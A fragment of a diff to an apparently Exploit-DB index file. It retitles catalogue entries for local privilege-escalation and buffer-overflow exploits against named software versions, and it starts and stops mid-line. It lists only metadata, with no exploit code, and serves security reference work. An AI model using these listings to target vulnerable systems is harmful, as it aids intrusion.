Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 @@ -6828,12 +6830,12 @@ id,file,description,date,author,platform,type,port 12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0 -12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Exploit",2010-05-19,Lincoln,windows,local,0 +12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0 - Overflow (SEH)",2010-05-19,Lincoln,windows,local,0 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local,0 12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow",2010-05-21,sinn3r,windows,local,0 12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Exploit (SEH)",2010-05-31,Stoke,windows,local,0 +12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Overflow (SEH)",2010-05-31,Stoke,windows,local,0 40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 @@ -6963,20 +6965,20 @@ id,file,description,date,author,platform,type,port 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 -15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH)",2010-09-15,"sanjeev gupta",windows,local,0 +15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Overflow (SEH)",2010-09-15,"sanjeev gupta",windows,local,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0 15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 -15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0 +15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Overflow (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0 -15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0 +15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Overflow (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 -15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Exploit (SEH)",2010-09-27,"sanjeev gupta",windows,local,0 +15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Overflow (SEH)",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 @@ -7050,7 +7052,7 @@ id,file,description,date,author,platform,type,port 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0 -15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 +15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Overflow (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 @@ -7160,7 +7162,7 @@ id,file,description,date,author,platform,type,port 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 -16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Exploit (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0 +16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Overflow (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local,0 @@ -7239,7 +7241,7 @@ id,file,description,date,author,platform,type,port 17780,platforms/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local,0 17783,platforms/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - Overwrite (SEH)",2011-09-06,blake,windows,local,0 -17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass",2011-09-08,Rew,windows,local,0 +17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - Overflow (SEH + ASLR + DEP Bypass)",2011-09-08,Rew,windows,local,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0 @@ -7293,7 +7295,7 @@ id,file,description,date,author,platform,type,port 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez & David Mora",windows,local,0 18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow",2012-02-20,b33f,windows,local,0 -18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 +18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Overflow (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 @@ -7302,7 +7304,7 @@ id,file,description,date,author,platform,type,port 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 -18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0 +18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - Overflow (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Privilege Escalation",2012-04-12,anonymous,linux,local,0 @@ -7334,19 +7336,20 @@ id,file,description,date,author,platform,type,port 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Exploit",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Exploit",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",unix,local,0 -19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - 'liloconfig-color' Temporary file",1998-04-06,neonhaze,linux,local,0 -19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - 'makebootdisk' Temporary file",1998-04-06,neonhaze,linux,local,0 +19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - 'liloconfig-color' Temporary File",1998-04-06,neonhaze,linux,local,0 +19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - 'makebootdisk' Temporary File",1998-04-06,neonhaze,linux,local,0 19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT Symlink Exploit",1998-04-10,"Joe H",linux,local,0 -19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - 'netconfig' Temporary file",1998-04-06,neonhaze,linux,local,0 -19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - 'pkgtool' Temporary file",1998-04-06,neonhaze,linux,local,0 +19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - 'netconfig' Temporary File",1998-04-06,neonhaze,linux,local,0 +19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - 'pkgtool' Temporary File",1998-04-06,neonhaze,linux,local,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (2)",1998-05-05,pr10n,linux,local,0 +19080,platforms/linux/local/19080.txt,"Debian suidmanager 0.18 - Command Execution",1998-04-28,"Thomas Roessler",linux,local,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 -19106,platforms/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Exploit",1996-07-03,"Jeff Uphoff",linux,local,0 -19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Exploit",1999-11-03,Mastoras,unix,local,0 -19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 +19106,platforms/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Buffer Overrun",1996-07-03,"Jeff Uphoff",linux,local,0 +19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Change File Permission",1999-11-03,Mastoras,unix,local,0 +19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 -19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 +19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 - power management Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0 19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - 'sdtcm_convert' Exploit",1998-10-23,UNYUN,solaris,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 @@ -7354,29 +7357,29 @@ id,file,description,date,author,platform,type,port 19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Exploit",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 -19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Exploit",1999-01-03,"Dr. Mudge",linux,local,0 -19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme - Exploit",1997-02-25,"Cristian Schipor",solaris,local,0 -19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 ffbconfig - Exploit",1997-02-10,"Cristian Schipor",solaris,local,0 -19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 chkey - Exploit",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 Ping - Exploit",1997-06-15,"Adam Caldwell",solaris,local,0 -19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig - Exploit",1998-07-20,Loneguard,irix,local,0 +19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Privilege Escalation",1999-01-03,"Dr. Mudge",linux,local,0 +19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Privilege Escalation",1997-02-25,"Cristian Schipor",solaris,local,0 +19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 - 'ffbconfig' Exploit",1997-02-10,"Cristian Schipor",solaris,local,0 +19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 - 'chkey' Exploit",1997-05-19,"Adam Morrison",solaris,local,0 +19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 - 'Ping' Exploit",1997-06-15,"Adam Caldwell",solaris,local,0 +19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Exploit",1998-07-20,Loneguard,irix,local,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0 -19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Exploit (1)",1997-04-26,cesaro,unix,local,0 +19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Privilege Escalation (2)",1997-04-26,BeastMaster,unix,local,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0 19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 -19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0 +19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Exploit",1997-11-26,anonymous,solaris,local,0 19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)",1997-08-25,jGgM,unix,local,0 19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3)",1997-08-25,jGgM,unix,local,0 -19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit",1996-12-04,"Roger Espel Llima",unix,local,0 -19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 -19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 +19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Privilege Escalation",1996-12-04,"Roger Espel Llima",unix,local,0 +19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 +19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0 19210,platforms/irix/local/19210.txt,"SGI IRIX 6.5.4 - midikeys Root",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Phonebook Buffer Overflow",1999-05-20,"David Litchfield",windows,local,0 @@ -7386,7 +7389,7 @@ id,file,description,date,author,platform,type,port 19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit",1998-05-19,"Matt Chapman",windows,local,0 -19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Exploit",1999-05-10,"Thomas Krug",windows,local,0 +19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Code Execution",1999-05-10,"Thomas Krug",windows,local,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",aix,local,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 @@ -7395,71 +7398,70 @@ id,file,description,date,author,platform,type,port 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink Exploit",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 -19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0 +19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Buffer Overflow",1999-03-02,Arthur,linux,local,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot Exploit",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink Exploit",1999-03-21,Stealthf0rk,linux,local,0 -19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 +19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 - 'ff.core' Exploit",1999-01-07,"John McDonald",solaris,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 - 'lpc' Exploit",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 -19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 +19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 - 'cdplayer' Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 -19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 colorview - Exploit",1995-02-09,"Dave Sill",irix,local,0 +19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 - 'Cadmin' Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview' Exploit",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Exploit",1997-05-16,"Mike Neuman",irix,local,0 -19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df - Exploit",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 - datman/cdman Exploit",1996-12-09,"Yuri Volobuev",irix,local,0 +19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 - 'df' Exploit",1997-05-24,"David Hedley",irix,local,0 +19275,platforms/irix/local/19275.txt,"SGI IRIX 6.4 - datman/cdman Exploit",1996-12-09,"Yuri 